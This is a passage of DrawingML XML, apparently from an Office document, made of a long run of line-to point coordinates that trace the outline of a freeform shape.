                  <a:pt x="14118" y="7072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14118" y="7020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14106" y="7011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14092" y="7062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14059" y="7145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14019" y="7239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13982" y="7328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13946" y="7328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13899" y="7328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13852" y="7351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13847" y="7309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13837" y="7319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13821" y="7267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13833" y="7187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13826" y="7104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13807" y="7062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13791" y="7072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13781" y="7145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13791" y="7248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13781" y="7216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13769" y="7174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13748" y="7136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13739" y="7094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13744" y="7052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13739" y="7001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13697" y="6940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13687" y="6889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13656" y="6857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13625" y="6744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13599" y="6642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13604" y="6610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13588" y="6549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13625" y="6558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13645" y="6507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13687" y="6549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13718" y="6529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13774" y="6712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13821" y="6847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13878" y="6889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13946" y="6991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14019" y="7033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14076" y="6969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14118" y="6950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14148" y="6969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14184" y="7136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14252" y="7155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14318" y="7187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14433" y="7226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14516" y="7206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14610" y="7206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14719" y="7187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14770" y="7290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14796" y="7393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14843" y="7421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14921" y="7534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14940" y="7585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14914" y="7636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15004" y="7803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15044" y="7822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15128" y="7739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15148" y="7864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15159" y="8028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15185" y="8201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15221" y="8471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15284" y="8653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15298" y="8737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15319" y="8910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15355" y="9045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15376" y="9106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15402" y="9241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15433" y="9433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15496" y="9558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15522" y="9517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15536" y="9424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15588" y="9382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15569" y="9343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15595" y="9241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15625" y="9228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15621" y="8994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15640" y="8859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15630" y="8747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15609" y="8573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15621" y="8471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15647" y="8458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15698" y="8406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15724" y="8378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15718" y="8317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15776" y="8224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15817" y="8140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15873" y="7976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15951" y="7883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15977" y="7803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15967" y="7701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16040" y="7668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16081" y="7668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16087" y="7617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16113" y="7627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16128" y="7636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16132" y="7617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16158" y="7649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16174" y="7575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16165" y="7524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16221" y="7534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16252" y="7617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16268" y="7678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16278" y="7752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16299" y="7822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16351" y="7935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16387" y="7957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16382" y="8009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16438" y="8163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16460" y="8284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16450" y="8448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16490" y="8480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16528" y="8490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16589" y="8397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16625" y="8326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16657" y="8439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16677" y="8612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16702" y="8779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16728" y="8849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16728" y="8994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16754" y="9074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16740" y="9176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16749" y="9279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16735" y="9414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16728" y="9497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16745" y="9568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16749" y="9484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16780" y="9549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16817" y="9619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16827" y="9690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16853" y="9741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16869" y="9805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16864" y="9908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16890" y="9979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16900" y="10091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16936" y="10184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16947" y="10255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17020" y="10370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17077" y="10473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17117" y="10460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17117" y="10421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17091" y="10296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17072" y="10255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17065" y="10174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17060" y="10123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17065" y="10062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17060" y="9969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17034" y="9876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16999" y="9793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16983" y="9783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16952" y="9712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16916" y="9690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16879" y="9610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16864" y="9497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16832" y="9372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16792" y="9372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16787" y="9270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16801" y="9148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16827" y="8952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16822" y="8798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16874" y="8798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16869" y="8901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16921" y="8901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16978" y="8961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17013" y="9106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17039" y="9176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17091" y="9199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="9279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17124" y="9372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17149" y="9465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17221" y="9343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17268" y="9228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17336" y="9138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17383" y="9045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17376" y="8807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17336" y="8551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17294" y="8439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17232" y="8355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17164" y="8182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17107" y="8037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17112" y="7944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17154" y="7813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17221" y="7701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17247" y="7678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17331" y="7720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17320" y="7771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17345" y="7874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17376" y="7864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17388" y="7720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17449" y="7701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17527" y="7627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17553" y="7556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17579" y="7598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17609" y="7534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17677" y="7514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17734" y="7412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17802" y="7290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17838" y="7123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17864" y="6950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17885" y="6805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17916" y="6796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17916" y="6683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17906" y="6571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17864" y="6529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17838" y="6456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17869" y="6417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17854" y="6314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17797" y="6212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17739" y="6087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17694" y="5955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17616" y="5881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17626" y="5788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17668" y="5718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17677" y="5647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17750" y="5605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17724" y="5532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17687" y="5532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17626" y="5480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17584" y="5573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17532" y="5532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17517" y="5471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17465" y="5451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17413" y="5358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17428" y="5297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17480" y="5288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17496" y="5195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17538" y="5102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17574" y="5050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17621" y="5143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17600" y="5236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17626" y="5288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17609" y="5349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17661" y="5307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17687" y="5246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17755" y="5204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17791" y="5246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17828" y="5256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17838" y="5275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17843" y="5349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17854" y="5368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17843" y="5390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17843" y="5451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17864" y="5471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17880" y="5480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17890" y="5503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17906" y="5493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17906" y="5471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17937" y="5503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18005" y="5615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17967" y="5634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18024" y="5779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18035" y="5881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18056" y="5955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18102" y="5942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18134" y="5881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18180" y="5852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18186" y="5779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18149" y="5625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18113" y="5532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18024" y="5368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17979" y="5307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17953" y="5288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17958" y="5275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17941" y="5214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17958" y="5172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17988" y="5153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18005" y="5082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18009" y="5060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18031" y="5031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17998" y="4938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18005" y="4896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18014" y="4855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18040" y="4864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18035" y="4826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18076" y="4723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18134" y="4784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18170" y="4784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18217" y="4701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18226" y="4620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18248" y="4466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18269" y="4312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18252" y="4219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18264" y="4024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18205" y="3809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18149" y="3655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18136" y="3539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18154" y="3581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18243" y="3716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18309" y="3889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18335" y="3991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18393" y="4136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18434" y="4261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="4373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="4271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18554" y="4351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18523" y="4261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18419" y="4126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18377" y="3930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18476" y="3972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18330" y="3735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18252" y="3613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18196" y="3478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18123" y="3356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18071" y="3263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18056" y="3286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18102" y="3347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18082" y="3407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17941" y="3263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17880" y="3253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17875" y="3314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17812" y="3286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17750" y="3202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17661" y="3183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17713" y="2884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17750" y="2637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17890" y="2596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18050" y="2618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18076" y="2554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18165" y="2576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18212" y="2670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18278" y="2657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18372" y="2628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18290" y="2554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18290" y="2349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18387" y="2310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18516" y="2464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18558" y="2329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18523" y="2227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18575" y="2217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18646" y="2390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18620" y="2493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18615" y="2628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18620" y="2782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18558" y="2811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18589" y="2875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18589" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18657" y="3119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18827" y="3407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18942" y="3603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19004" y="3696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19025" y="3571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18978" y="3440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19041" y="3407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18983" y="3263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19035" y="3202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18983" y="3151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18947" y="3048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18989" y="3048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18890" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18818" y="2833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18787" y="2782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18775" y="2657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18745" y="2576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18822" y="2596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18839" y="2544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18890" y="2596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18957" y="2493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19082" y="2576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19067" y="2516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19086" y="2442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19103" y="2361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19133" y="2349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19206" y="2259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19315" y="2288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19305" y="2259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19263" y="2207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19216" y="2175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19119" y="2073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19030" y="2012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19098" y="2021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19119" y="1970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18761" y="1498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18657" y="1447"/>
                </a:lnTo>
                <a:lnTo>
